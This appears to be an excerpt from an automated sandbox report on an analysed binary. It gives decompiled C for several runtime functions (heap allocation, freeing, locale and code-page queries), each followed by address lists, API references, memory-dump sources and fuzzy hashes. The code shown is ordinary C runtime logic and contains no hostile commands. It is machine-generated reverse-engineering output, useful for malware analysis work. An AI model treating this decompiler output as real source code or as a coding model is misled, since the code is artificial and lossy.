                                                0x00c2b40a
                                                0x00c2b45a
                                                0x00c2b465

                                                APIs
                                                  • Part of subcall function 00C22F42: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C23805,00000001,00000364,00000005,000000FF,?,?,?,00C1DA2D,00C1BB4B), ref: 00C22F83
                                                • _free.LIBCMT ref: 00C2B45A
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: 1953ac5848f1bd59fc20ca3228b3632cce7721de0e54c384348345dcae75a7b7
                                                • Instruction ID: 5a857d4caac85c2d45771fb0e1146df015838ac8cc7f610e9008fa3a73582487
                                                • Opcode Fuzzy Hash: 1953ac5848f1bd59fc20ca3228b3632cce7721de0e54c384348345dcae75a7b7
                                                • Instruction Fuzzy Hash: 240149726043266BC3219F68D88198AFB98FB043B0F140669E655A7AC0D7B0AD10C7A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 544 c2130f-c21339 call c22f42 call c22f9f 549 c21375-c21378 544->549 550 c2133b-c21370 call c21195 544->550 550->549
                                                C-Code - Quality: 82%
                                                			E00C2130F(void* __ebx, intOrPtr* __ecx, void* __eflags) {
                                                				void* _v5;
                                                				char _v12;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				char _v36;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				intOrPtr _t16;
                                                				void* _t17;
                                                				char _t23;
                                                				void* _t27;
                                                				intOrPtr* _t32;
                                                				intOrPtr _t33;
                                                
                                                				_t32 = __ecx;
                                                				_t16 = E00C22F42(1, 0xb8);
                                                				_t31 =  *_t32;
                                                				_t33 = _t16;
                                                				 *((intOrPtr*)( *_t32)) = _t33;
                                                				_t17 = E00C22F9F(0);
                                                				_t37 = _t33;
                                                				if(_t33 != 0) {
                                                					_v36 =  *_t32;
                                                					_v32 =  *((intOrPtr*)(_t32 + 4));
                                                					_v28 =  *((intOrPtr*)(_t32 + 8));
                                                					_v24 =  *((intOrPtr*)(_t32 + 0xc));
                                                					_v20 =  *((intOrPtr*)(_t32 + 0x10));
                                                					_t23 = 4;
                                                					_v12 = _t23;
                                                					_v16 = _t23;
                                                					_push( &_v12);
                                                					_push( &_v36);
                                                					_push( &_v16); // executed
                                                					_t27 = E00C21195(__ebx, _t31, _t32, _t33, _t37); // executed
                                                					return _t27;
                                                				}
                                                				return _t17;
                                                			}




















                                                0x00c21320
                                                0x00c21322
                                                0x00c21327
                                                0x00c21329
                                                0x00c2132d
                                                0x00c2132f
                                                0x00c21337
                                                0x00c21339
                                                0x00c21340
                                                0x00c21346
                                                0x00c2134c
                                                0x00c21352
                                                0x00c2135a
                                                0x00c2135d
                                                0x00c2135e
                                                0x00c21361
                                                0x00c21367
                                                0x00c2136b
                                                0x00c2136f
                                                0x00c21370
                                                0x00000000
                                                0x00c21370
                                                0x00c21378

                                                APIs
                                                  • Part of subcall function 00C22F42: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C23805,00000001,00000364,00000005,000000FF,?,?,?,00C1DA2D,00C1BB4B), ref: 00C22F83
                                                • _free.LIBCMT ref: 00C2132F
                                                  • Part of subcall function 00C22F9F: HeapFree.KERNEL32(00000000,00000000,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?), ref: 00C22FB5
                                                  • Part of subcall function 00C22F9F: GetLastError.KERNEL32(?,?,00C2BDE5,?,00000000,?,?,?,00C2C088,?,00000007,?,?,00C2C57B,?,?), ref: 00C22FC7
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateErrorFreeLast_free
                                                • String ID:
                                                • API String ID: 314386986-0
                                                • Opcode ID: 7c79bab463529807ac23cebe44d14a7201cf16fe82261e31e84b607e1222d649
                                                • Instruction ID: 86d4537e683315909a4186629904bf5af36bc4bb4e71b79172e42fbdac2440a1
                                                • Opcode Fuzzy Hash: 7c79bab463529807ac23cebe44d14a7201cf16fe82261e31e84b607e1222d649
                                                • Instruction Fuzzy Hash: D4011EB6D00219AFCB10DFA5D441ADEBBF8FB48710F144166EA14E7640E770AA55CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 552 c22f42-c22f4d 553 c22f5b-c22f61 552->553 554 c22f4f-c22f59 552->554 556 c22f63-c22f64 553->556 557 c22f7a-c22f8b RtlAllocateHeap 553->557 554->553 555 c22f8f-c22f9a call c1da28 554->555 562 c22f9c-c22f9e 555->562 556->557 558 c22f66-c22f6d call c228bd 557->558 559 c22f8d 557->559 558->555 565 c22f6f-c22f78 call c2058c 558->565 559->562 565->555 565->557
                                                C-Code - Quality: 100%
                                                			E00C22F42(signed int _a4, signed int _a8) {
                                                				void* _t8;
                                                				signed int _t13;
                                                				signed int _t18;
                                                				long _t19;
                                                
                                                				_t18 = _a4;
                                                				if(_t18 == 0) {
                                                					L2:
                                                					_t19 = _t18 * _a8;
                                                					if(_t19 == 0) {
                                                						_t19 = _t19 + 1;
                                                					}
                                                					while(1) {
                                                						_t8 = RtlAllocateHeap( *0xc99824, 8, _t19); // executed
                                                						if(_t8 != 0) {
                                                							break;
                                                						}
                                                						__eflags = E00C228BD();
                                                						if(__eflags == 0) {
                                                							L8:
                                                							 *((intOrPtr*)(E00C1DA28(__eflags))) = 0xc;
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						__eflags = E00C2058C(__eflags, _t19);
                                                						if(__eflags == 0) {
                                                							goto L8;
                                                						}
                                                					}
                                                					return _t8;
                                                				}
                                                				_t13 = 0xffffffe0;
                                                				if(_t13 / _t18 < _a8) {
                                                					goto L8;
                                                				}
                                                				goto L2;
                                                			}







                                                0x00c22f48
                                                0x00c22f4d
                                                0x00c22f5b
                                                0x00c22f5b
                                                0x00c22f61
                                                0x00c22f63
                                                0x00c22f63
                                                0x00c22f7a
                                                0x00c22f83
                                                0x00c22f8b
                                                0x00000000
                                                0x00000000
                                                0x00c22f6b
                                                0x00c22f6d
                                                0x00c22f8f
                                                0x00c22f94
                                                0x00c22f9a
                                                0x00000000
                                                0x00c22f9a
                                                0x00c22f76
                                                0x00c22f78
                                                0x00000000
                                                0x00000000
                                                0x00c22f78
                                                0x00000000
                                                0x00c22f7a
                                                0x00c22f53
                                                0x00c22f59
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C23805,00000001,00000364,00000005,000000FF,?,?,?,00C1DA2D,00C1BB4B), ref: 00C22F83
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 93a9b435b0044e0fd2fde2dbfdb6c0b55ed1fdcd241eafa4e9cf864aee34dbe7
                                                • Instruction ID: 131611e784f5b5f886e3813364cec01f57b2ffbfe41e4b80cea41a72c42f32b6
                                                • Opcode Fuzzy Hash: 93a9b435b0044e0fd2fde2dbfdb6c0b55ed1fdcd241eafa4e9cf864aee34dbe7
                                                • Instruction Fuzzy Hash: 38F0E9322042317ADB215AE2BE05B6F77A8EF41770F164211FC19D6994CF30DE0196E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C22FD9(long _a4) {
                                                				void* _t4;
                                                				long _t8;
                                                
                                                				_t8 = _a4;
                                                				if(_t8 > 0xffffffe0) {
                                                					L7:
                                                					 *((intOrPtr*)(E00C1DA28(__eflags))) = 0xc;
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				if(_t8 == 0) {
                                                					_t8 = _t8 + 1;
                                                				}
                                                				while(1) {
                                                					_t4 = RtlAllocateHeap( *0xc99824, 0, _t8); // executed
                                                					if(_t4 != 0) {
                                                						break;
                                                					}
                                                					__eflags = E00C228BD();
                                                					if(__eflags == 0) {
                                                						goto L7;
                                                					}
                                                					__eflags = E00C2058C(__eflags, _t8);
                                                					if(__eflags == 0) {
                                                						goto L7;
                                                					}
                                                				}
                                                				return _t4;
                                                			}





                                                0x00c22fdf
                                                0x00c22fe5
                                                0x00c23017
                                                0x00c2301c
                                                0x00c23022
                                                0x00000000
                                                0x00c23022
                                                0x00c22fe9
                                                0x00c22feb
                                                0x00c22feb
                                                0x00c23002
                                                0x00c2300b
                                                0x00c23013
                                                0x00000000
                                                0x00000000
                                                0x00c22ff3
                                                0x00c22ff5
                                                0x00000000
                                                0x00000000
                                                0x00c22ffe
                                                0x00c23000
                                                0x00000000
                                                0x00000000
                                                0x00c23000
                                                0x00000000

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C2AB63,00000220,?,?,?,?,?,?,00C1B9BE,?,?,?), ref: 00C2300B
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 1e7ec5ec3851af599777f301cf3a23dbabd91ced98eb06b9b607601cbc088f2c
                                                • Instruction ID: b46eaff73fc5f10b50925ad40bd1bc113ff499179d3d3cfcf06dbdc87cf6a6f4
                                                • Opcode Fuzzy Hash: 1e7ec5ec3851af599777f301cf3a23dbabd91ced98eb06b9b607601cbc088f2c
                                                • Instruction Fuzzy Hash: 40E0E5322001B066E721276ABC01B6E7A8C9F067B0F150121BC56928D1DB28DF00A2F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00C2D589(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                				short _v8;
                                                				short _t17;
                                                				signed int _t18;
                                                				signed int _t23;
                                                				signed int _t25;
                                                				signed int _t26;
                                                				signed int _t27;
                                                				void* _t30;
                                                				void* _t31;
                                                				intOrPtr _t32;
                                                				intOrPtr _t33;
                                                				intOrPtr* _t36;
                                                				intOrPtr* _t37;
                                                
                                                				_push(__ecx);
                                                				_t23 = _a4;
                                                				if(_t23 == 0) {
                                                					L21:
                                                					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
                                                						_t17 = _v8;
                                                						if(_t17 == 0) {
                                                							_t17 = GetACP();
                                                						}
                                                						L25:
                                                						return _t17;
                                                					}
                                                					L22:
                                                					_t17 = 0;
                                                					goto L25;
                                                				}
                                                				_t18 = 0;
                                                				if( *_t23 == 0) {
                                                					goto L21;
                                                				}
                                                				_t36 = L"ACP";
                                                				_t25 = _t23;
                                                				while(1) {
                                                					_t30 =  *_t25;
                                                					if(_t30 !=  *_t36) {
                                                						break;
                                                					}
                                                					if(_t30 == 0) {
                                                						L7:
                                                						_t26 = _t18;
                                                						L9:
                                                						if(_t26 == 0) {
                                                							goto L21;
                                                						}
                                                						_t37 = L"OCP";
                                                						_t27 = _t23;
                                                						while(1) {
                                                							_t31 =  *_t27;
                                                							if(_t31 !=  *_t37) {
                                                								break;
                                                							}
                                                							if(_t31 == 0) {
                                                								L17:
                                                								if(_t18 != 0) {
                                                									_t17 = E00C1D662(_t23, _t23);
                                                									goto L25;
                                                								}
                                                								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
                                                									goto L22;
                                                								}
                                                								_t17 = _v8;
                                                								goto L25;
                                                							}
                                                							_t32 =  *((intOrPtr*)(_t27 + 2));
                                                							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                                                								break;
                                                							}
                                                							_t27 = _t27 + 4;
                                                							_t37 = _t37 + 4;
                                                							if(_t32 != 0) {
                                                								continue;
                                                							}
                                                							goto L17;
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t18 = _t18 | 0x00000001;
                                                						goto L17;
                                                					}
                                                					_t33 =  *((intOrPtr*)(_t25 + 2));
                                                					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                                                						break;
                                                					}
                                                					_t25 = _t25 + 4;
                                                					_t36 = _t36 + 4;
                                                					if(_t33 != 0) {
                                                						continue;
                                                					}
                                                					goto L7;
                                                				}
                                                				asm("sbb edx, edx");
                                                				_t26 = _t25 | 0x00000001;
                                                				goto L9;
                                                			}
















                                                0x00c2d58e
                                                0x00c2d58f
                                                0x00c2d596
                                                0x00c2d63a
                                                0x00c2d653
                                                0x00c2d659
                                                0x00c2d65e
                                                0x00c2d660
                                                0x00c2d660
                                                0x00c2d666
                                                0x00c2d669
                                                0x00c2d669
                                                0x00c2d655
                                                0x00c2d655
                                                0x00000000
                                                0x00c2d655
                                                0x00c2d59c
                                                0x00c2d5a1
                                                0x00000000
                                                0x00000000
                                                0x00c2d5a7
                                                0x00c2d5ac
                                                0x00c2d5ae
                                                0x00c2d5ae
                                                0x00c2d5b4
                                                0x00000000
                                                0x00000000
                                                0x00c2d5b9
                                                0x00c2d5d0
                                                0x00c2d5d0
                                                0x00c2d5d9
                                                0x00c2d5db
                                                0x00000000
                                                0x00000000
                                                0x00c2d5dd
                                                0x00c2d5e2
                                                0x00c2d5e4
                                                0x00c2d5e4
                                                0x00c2d5ea
                                                0x00000000
                                                0x00000000
                                                0x00c2d5ef
                                                0x00c2d60d
                                                0x00c2d60f
                                                0x00c2d632
                                                0x00000000
                                                0x00c2d637
                                                0x00c2d62a
                                                0x00000000
                                                0x00000000
                                                0x00c2d62c
                                                0x00000000
                                                0x00c2d62c
                                                0x00c2d5f1
                                                0x00c2d5f9
                                                0x00000000
                                                0x00000000
                                                0x00c2d5fb
                                                0x00c2d5fe
                                                0x00c2d604
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2d606
                                                0x00c2d608
                                                0x00c2d60a
                                                0x00000000
                                                0x00c2d60a
                                                0x00c2d5bb
                                                0x00c2d5c3
                                                0x00000000
                                                0x00000000
                                                0x00c2d5c5
                                                0x00c2d5c8
                                                0x00c2d5ce
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2d5ce
                                                0x00c2d5d4
                                                0x00c2d5d6
                                                0x00000000

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00C2D8A7,00000002,00000000,?,?,?,00C2D8A7,?,00000000), ref: 00C2D622
                                                • GetLocaleInfoW.KERNEL32(?,20001004,00C2D8A7,00000002,00000000,?,?,?,00C2D8A7,?,00000000), ref: 00C2D64B
                                                • GetACP.KERNEL32(?,?,00C2D8A7,?,00000000), ref: 00C2D660
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: ACP$OCP
                                                • API String ID: 2299586839-711371036
                                                • Opcode ID: f8b0cd4c7ce28030e2bc9ef17cb8e259c8a9d2b392be9cf5c2fbf2a1904c499f
                                                • Instruction ID: 523aa336a6a561cb9395934569e972fa1501832cdd7e77c102c25fdd9c9de037
                                                • Opcode Fuzzy Hash: f8b0cd4c7ce28030e2bc9ef17cb8e259c8a9d2b392be9cf5c2fbf2a1904c499f
                                                • Instruction Fuzzy Hash: 8C21EDA2A00120EADB348F55E900B9B73A6EB70F64B168864F91FC7900EB32DF40C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00C2D75E(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
                                                				signed int _v8;
                                                				int _v12;
                                                				int _v16;
                                                				char _v20;
                                                				signed short* _v24;
                                                				short* _v28;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t39;
                                                				void* _t45;
                                                				signed short* _t46;
                                                				signed short _t47;
                                                				short* _t48;
                                                				int _t49;
                                                				void* _t53;
                                                				short* _t55;
                                                				short* _t56;
                                                				short* _t57;
                                                				int _t64;
                                                				int _t66;
                                                				short* _t70;
                                                				intOrPtr _t73;
                                                				void* _t75;
                                                				short* _t76;
                                                				intOrPtr _t83;
                                                				short* _t86;
                                                				short* _t89;
                                                				short** _t99;
                                                				short* _t100;
                                                				signed short _t101;
                                                				signed int _t104;
                                                				void* _t105;
                                                
                                                				_t39 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t39 ^ _t104;
                                                				_t86 = _a12;
                                                				_t101 = _a4;
                                                				_v28 = _a8;
                                                				_v24 = E00C23663(__ecx, __edx) + 0x50;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t45 = E00C23663(__ecx, __edx);
                                                				_t97 = 0;
                                                				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                                                				_t89 = _t101 + 0x80;
                                                				_t46 = _v24;
                                                				 *_t46 = _t101;
                                                				_t99 =  &(_t46[2]);
                                                				 *_t99 = _t89;
                                                				if(_t89 != 0 &&  *_t89 != 0) {
                                                					_t83 =  *0xc38914; // 0x17
                                                					E00C2D6FD(_t89, 0, 0xc38800, _t83 - 1, _t99);
                                                					_t46 = _v24;
                                                					_t105 = _t105 + 0xc;
                                                					_t97 = 0;
                                                				}
                                                				_v20 = _t97;
                                                				_t47 =  *_t46;
                                                				if(_t47 == 0 ||  *_t47 == _t97) {
                                                					_t48 =  *_t99;
                                                					__eflags = _t48;
                                                					if(_t48 == 0) {
                                                						L19:
                                                						_v20 = 0x104;
                                                						_t49 = GetUserDefaultLCID();
                                                						_v12 = _t49;
                                                						_v16 = _t49;
                                                						goto L20;
                                                					}
                                                					__eflags =  *_t48 - _t97;
                                                					if(__eflags == 0) {
                                                						goto L19;
                                                					}
                                                					E00C2D09F(_t89, _t97, __eflags,  &_v20);
                                                					_pop(_t89);
                                                					goto L20;
                                                				} else {
                                                					_t70 =  *_t99;
                                                					if(_t70 == 0) {
                                                						L8:
                                                						E00C2D185(_t89, _t97, __eflags,  &_v20);
                                                						L9:
                                                						_pop(_t89);
                                                						if(_v20 != 0) {
                                                							_t100 = 0;
                                                							__eflags = 0;
                                                							L25:
                                                							asm("sbb esi, esi");
                                                							_t101 = E00C2D589(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
                                                							__eflags = _t101;
                                                							if(_t101 == 0) {
                                                								L22:
                                                								_t53 = 0;
                                                								L23:
                                                								return E00C17193(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
                                                							}
                                                							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
                                                							__eflags = _t55;
                                                							if(_t55 == 0) {
                                                								goto L22;
                                                							}
                                                							_t56 = IsValidLocale(_v16, 1);
                                                							__eflags = _t56;
                                                							if(_t56 == 0) {
                                                								goto L22;
                                                							}
                                                							_t57 = _v28;
                                                							__eflags = _t57;
                                                							if(_t57 != 0) {
                                                								 *_t57 = _t101;
                                                							}
                                                							E00C25861(_v16,  &(_v24[0x128]), 0x55, _t100);
                                                							__eflags = _t86;
                                                							if(_t86 == 0) {
                                                								L34:
                                                								_t53 = 1;
                                                								goto L23;
                                                							}
                                                							_t33 =  &(_t86[0x90]); // 0xd0
                                                							E00C25861(_v16, _t33, 0x55, _t100);
                                                							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
                                                							__eflags = _t64;
                                                							if(_t64 == 0) {
                                                								goto L22;
                                                							}
                                                							_t36 =  &(_t86[0x40]); // 0x30
                                                							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
                                                							__eflags = _t66;
                                                							if(_t66 == 0) {
                                                								goto L22;
                                                							}
                                                							_t38 =  &(_t86[0x80]); // 0xb0
                                                							E00C3176E(_t38, _t101, _t38, 0x10, 0xa);
                                                							goto L34;
                                                						}
                                                						_t73 =  *0xc387fc; // 0x41
                                                						_t75 = E00C2D6FD(_t89, _t97, 0xc384f0, _t73 - 1, _v24);
                                                						_t105 = _t105 + 0xc;
                                                						if(_t75 == 0) {
                                                							L20:
                                                							_t100 = 0;
                                                							__eflags = 0;
                                                							L21:
                                                							if(_v20 != 0) {
                                                								goto L25;
                                                							}
                                                							goto L22;
                                                						}
                                                						_t76 =  *_t99;
                                                						_t100 = 0;
                                                						if(_t76 == 0) {
                                                							L14:
                                                							E00C2D185(_t89, _t97, __eflags,  &_v20);
                                                							L15:
                                                							_pop(_t89);
                                                							goto L21;
                                                						}
                                                						_t118 =  *_t76;
                                                						if( *_t76 == 0) {
                                                							goto L14;
                                                						}
                                                						E00C2D0EA(_t89, _t97, _t118,  &_v20);
                                                						goto L15;
                                                					}
                                                					_t114 =  *_t70 - _t97;
                                                					if( *_t70 == _t97) {
                                                						goto L8;
                                                					}
                                                					E00C2D0EA(_t89, _t97, _t114,  &_v20);
                                                					goto L9;
                                                				}
                                                			}





































                                                0x00c2d766
                                                0x00c2d76d
                                                0x00c2d774
                                                0x00c2d778
                                                0x00c2d77c
                                                0x00c2d78a
                                                0x00c2d78f
                                                0x00c2d790
                                                0x00c2d791
                                                0x00c2d792
                                                0x00c2d79a
                                                0x00c2d79c
                                                0x00c2d7a2
                                                0x00c2d7a8
                                                0x00c2d7ab
                                                0x00c2d7ad
                                                0x00c2d7b0
                                                0x00c2d7b4
                                                0x00c2d7bb
                                                0x00c2d7c8
                                                0x00c2d7cd
                                                0x00c2d7d0
                                                0x00c2d7d3
                                                0x00c2d7d3
                                                0x00c2d7d5
                                                0x00c2d7d8
                                                0x00c2d7dc
                                                0x00c2d84c
                                                0x00c2d84e
                                                0x00c2d850
                                                0x00c2d863
                                                0x00c2d863
                                                0x00c2d86a
                                                0x00c2d870
                                                0x00c2d873
                                                0x00000000
                                                0x00c2d873
                                                0x00c2d852
                                                0x00c2d855
                                                0x00000000
                                                0x00000000
                                                0x00c2d85b
                                                0x00c2d860
                                                0x00000000
                                                0x00c2d7e3
                                                0x00c2d7e3
                                                0x00c2d7e7
                                                0x00c2d7f9
                                                0x00c2d7fd
                                                0x00c2d802
                                                0x00c2d806
                                                0x00c2d807
                                                0x00c2d88f
                                                0x00c2d88f
                                                0x00c2d891
                                                0x00c2d89d
                                                0x00c2d8a7
                                                0x00c2d8ab
                                                0x00c2d8ad
                                                0x00c2d87e
                                                0x00c2d87e
                                                0x00c2d880
                                                0x00c2d88e
                                                0x00c2d88e
                                                0x00c2d8b3
                                                0x00c2d8b9
                                                0x00c2d8bb
                                                0x00000000
                                                0x00000000
                                                0x00c2d8c2
                                                0x00c2d8c8
                                                0x00c2d8ca
                                                0x00000000
                                                0x00000000
                                                0x00c2d8cc
                                                0x00c2d8cf
                                                0x00c2d8d1
                                                0x00c2d8d3
                                                0x00c2d8d3
                                                0x00c2d8e4
                                                0x00c2d8e9
                                                0x00c2d8eb
                                                0x00c2d94b
                                                0x00c2d94d
                                                0x00000000
                                                0x00c2d94d
                                                0x00c2d8f0
                                                0x00c2d8fa
                                                0x00c2d90a
                                                0x00c2d910
                                                0x00c2d912
                                                0x00000000
                                                0x00000000
                                                0x00c2d91a
                                                0x00c2d929
                                                0x00c2d92f
                                                0x00c2d931
                                                0x00000000
                                                0x00000000
                                                0x00c2d93b
                                                0x00c2d943
                                                0x00000000
                                                0x00c2d948
                                                0x00c2d80d
                                                0x00c2d81c
                                                0x00c2d821
                                                0x00c2d826
                                                0x00c2d876
                                                0x00c2d876
                                                0x00c2d876
                                                0x00c2d878
                                                0x00c2d87c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c2d87c
                                                0x00c2d828
                                                0x00c2d82a
                                                0x00c2d82e
                                                0x00c2d840
                                                0x00c2d844
                                                0x00c2d849
                                                0x00c2d849
                                                0x00000000
                                                0x00c2d849
                                                0x00c2d830
                                                0x00c2d833
                                                0x00000000
                                                0x00000000
                                                0x00c2d839
                                                0x00000000
                                                0x00c2d839
                                                0x00c2d7e9
                                                0x00c2d7ec
                                                0x00000000
                                                0x00000000
                                                0x00c2d7f2
                                                0x00000000
                                                0x00c2d7f2

                                                APIs
                                                  • Part of subcall function 00C23663: GetLastError.KERNEL32(?,?,?,00C1BE2E,?,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23668
                                                  • Part of subcall function 00C23663: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23706
                                                  • Part of subcall function 00C23663: _free.LIBCMT ref: 00C236C5
                                                  • Part of subcall function 00C23663: _free.LIBCMT ref: 00C236FB
                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C2D86A
                                                • IsValidCodePage.KERNEL32(00000000), ref: 00C2D8B3
                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00C2D8C2
                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C2D90A
                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C2D929
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
